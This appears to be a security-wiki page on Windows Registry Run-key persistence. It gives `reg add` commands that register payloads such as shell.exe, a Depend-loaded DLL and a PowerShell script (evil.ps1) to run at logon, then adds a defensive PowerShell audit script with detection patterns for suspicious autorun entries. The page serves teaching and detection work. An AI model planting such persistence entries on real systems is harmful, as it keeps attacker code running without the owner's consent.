# Run Keys Persistence

## Theory

A classic and widely used persistence technique involves adding an entry to the **Registry "Run" keys**, causing a specified program to execute automatically when a user logs in. This ensures that the attacker's payload is launched at every logon without any further interaction.

#### Trigger Condition

The execution of the referenced program occurs when a user logs in to Windows. The specific privilege level of the executed process depends on the security context of the affected user account:

* If added under **`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`**, the program runs in the context of the current user.
* If added under **`HKLM\Software\Microsoft\Windows\CurrentVersion\Run`**, the program executes for all users on the system, requiring Administrator privileges to modify.

This technique is simple, effective, and often overlooked, making it a popular choice for persistence in both malware and post-exploitation scenarios.

## Practice

{% hint style="success" %}
Registry entries under `HKU/HKCU` apply only to that user.\
Registry entries under `HKLM` apply to every user on the system.
{% endhint %}

{% hint style="info" %}
**Run/RunServices** keys will run every time a user logs in.

**RunOnce/RunServicesOnce** entries are deleted from the registry as soon as they have run.
{% endhint %}

{% tabs %}
{% tab title="Run/RunOnce/RunOnceEx" %}
You can force a user to execute a program on logon via the **Run**, **RunOnce** and **RunOnceEx** registry keys. The following registry keys specify applications to run at logon:

* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`

The **RunOnceEx** key entries can reference programs directly or list them as a dependency. For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx.

{% hint style="info" %}
RunOnceEx only executes from HKEY_LOCAL_MACHINE (HKLM).

RunOnceEx clears the registry key on completion of the command.
{% endhint %}

```powershell
#Run/RunOnce
## Add key for current user
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v PeMalware /t REG_SZ /d "C:\Users\user1\shell.exe"
## Add key for computer (all users)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v PeMalware /t REG_SZ /d "C:\Users\user1\shell.exe"

#RunOnceEx
#Add key for current user - Execute command / PE
#(as noted above, RunOnceEx is only processed under HKLM, so this HKCU entry is written but never executed)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v PeMalware /t REG_SZ /d "C:\tmp\shell.exe"
#Add key for computer (all users) - Execute DLL via the "Depend" subkey
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v DLLMalware /t REG_SZ /d "C:\tmp\shell.dll"
```

{% endtab %}

{% tab title="RunServices/RunServicesOnce" %}
The following Registry keys can control automatic startup of services during boot:

* `HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\RunServices`
* `HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`

```powershell
#Add key for current user - Execute command / PE
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe"

#Add key for computer (all users) - Execute command / PE
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe"
```

{% endtab %}

{% tab title="Policies" %}
We can use policy settings to specify startup programs with the following registry keys:

* `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`

```powershell
#Add key for current user - Execute command / PE
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe"

#Add key for computer (all users) - Execute command
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Pwned /t REG_SZ /d "powershell.exe C:\tmp\evil.ps1"
```

{% endtab %}
{% endtabs %}
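The same key list that makes these locations useful for persistence makes them a short, fixed set to audit. The script below is an added example written for this page; it is not part of the original page or of any referenced tooling. It walks every autorun key named above (including the numbered `RunOnceEx` subkeys and their `Depend` DLL entries) under `HKLM` and every loaded profile in `HKEY_USERS`, and flags entries that match the patterns shown in the examples on this page: binaries launched from scratch or user-writable locations such as `C:\tmp\`, commands that invoke a script interpreter such as `powershell.exe`, DLLs referenced via `RunOnceEx\...\Depend`, and anything set through the `Policies\Explorer\Run` keys. The path and interpreter regexes are assumptions to tune per environment, and the script assumes Windows PowerShell 5.1 or later, run elevated so all user hives are readable.

```powershell
# Added audit example, not part of the original page: enumerate the autorun
# registry locations discussed above and flag entries worth a closer look.
# Assumes Windows PowerShell 5.1 or later; run elevated so every loaded
# user hive under HKEY_USERS is readable, not only the current user's.

$RelativeKeys = @(
    'Software\Microsoft\Windows\CurrentVersion\Run',
    'Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'Software\Microsoft\Windows\CurrentVersion\RunOnceEx',
    'Software\Microsoft\Windows\CurrentVersion\RunServices',
    'Software\Microsoft\Windows\CurrentVersion\RunServicesOnce',
    'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
)

# Heuristics (assumptions, tune per environment): commands launched from
# scratch or user-writable locations, and script interpreters used as the
# autorun command, mirror the patterns in the examples on this page.
$WritableLocationPattern = '(?i)\\(Temp|tmp|Downloads|Public|ProgramData|AppData)\\|^"?[A-Z]:\\tmp\\'
$InterpreterPattern      = '(?i)\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b'

function Get-AutorunEntry {
    [CmdletBinding()]
    param()

    # Expose HKEY_USERS as a drive so every loaded profile can be walked.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS -Scope Global | Out-Null
    }
    $roots = @('HKLM:') + @(Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue |
                             ForEach-Object { "HKU:\$($_.PSChildName)" })

    foreach ($root in $roots) {
        foreach ($rel in $RelativeKeys) {
            $path = Join-Path $root $rel
            if (-not (Test-Path -LiteralPath $path)) { continue }

            # RunOnceEx nests its commands in numbered subkeys and DLLs under
            # "Depend", so walk every subkey, not just the top-level key.
            $keys = @(Get-Item -LiteralPath $path) +
                    @(Get-ChildItem -LiteralPath $path -Recurse -ErrorAction SilentlyContinue)

            foreach ($key in $keys) {
                foreach ($name in $key.GetValueNames()) {
                    # Keep %VAR% unexpanded so the stored command is reported as written.
                    $data = [string]$key.GetValue($name, $null, 'DoNotExpandEnvironmentNames')
                    if ([string]::IsNullOrWhiteSpace($data)) { continue }

                    $flags = @()
                    if ($data -match $WritableLocationPattern)         { $flags += 'writable-path' }
                    if ($data -match $InterpreterPattern)              { $flags += 'interpreter' }
                    if ($key.Name -match '\\RunOnceEx\\.*\\Depend$')   { $flags += 'runonceex-dll' }
                    if ($key.Name -match '\\Policies\\Explorer\\Run$') { $flags += 'policy-key' }

                    [pscustomobject]@{
                        Key       = $key.Name
                        ValueName = if ($name) { $name } else { '(Default)' }
                        Command   = $data
                        Flags     = ($flags -join ',')
                    }
                }
            }
        }
    }
}

# Usage: full inventory first, then only the flagged entries.
Get-AutorunEntry | Format-Table -AutoSize
Get-AutorunEntry | Where-Object Flags | Format-Table -AutoSize
```

Run it once on a known-good build to record a baseline inventory, then diff later runs against that baseline; a new value under any of these keys, a `Depend` subkey appearing under `RunOnceEx`, or a command pointing into a user profile or `C:\tmp\` is exactly the footprint the `reg add` commands above leave behind.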

## References

{% embed url="https://attack.mitre.org/techniques/T1547/001/" %}
